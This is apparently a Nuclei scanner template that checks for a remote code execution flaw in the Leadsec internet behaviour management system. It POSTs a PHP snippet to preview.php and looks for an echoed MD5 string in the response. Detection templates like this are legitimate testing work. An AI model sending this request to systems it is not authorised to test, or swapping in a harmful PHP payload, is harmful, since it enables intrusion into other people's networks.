id: leadsec-preview-rce

info:
  name: 网御上网行为管理系统 preview.php 远程代码执行
  author: Str1am
  severity: high
  tags: leadsec,rce

requests:
  - raw:
      - |
        POST /preview.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        previewtxt=<?php echo '202cb962ac59075b964b07152d234b70';?>

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b70"
        part: body
        condition: and